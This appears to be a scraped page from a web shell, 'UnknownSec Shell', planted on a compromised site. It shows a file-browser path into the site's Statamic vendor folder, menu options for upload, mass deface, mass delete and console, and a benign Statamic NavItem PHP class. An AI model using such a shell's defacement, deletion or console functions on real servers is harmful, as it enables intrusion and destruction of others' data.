shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Http
/
Resources
/
CP
/
Nav
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
NavItem.php
<?php namespace Statamic\Http\Resources\CP\Nav; use Illuminate\Http\Resources\Json\JsonResource; class NavItem extends JsonResource { public function toArray($request) { if ($children = $this->resource->resolveChildren()->children()) { $children = self::collection($children); } return [ 'display' => $this->resource->display(), 'section' => $this->resource->section(), 'id' => $this->resource->id(), 'url' => $this->resource->editableUrl(), 'icon' => $this->resource->icon(), 'manipulations' => $this->resource->manipulations(), 'children' => $children ?? [], 'original' => NavItem::make($this->resource->original()), ]; } }
© 2026 UnknownSec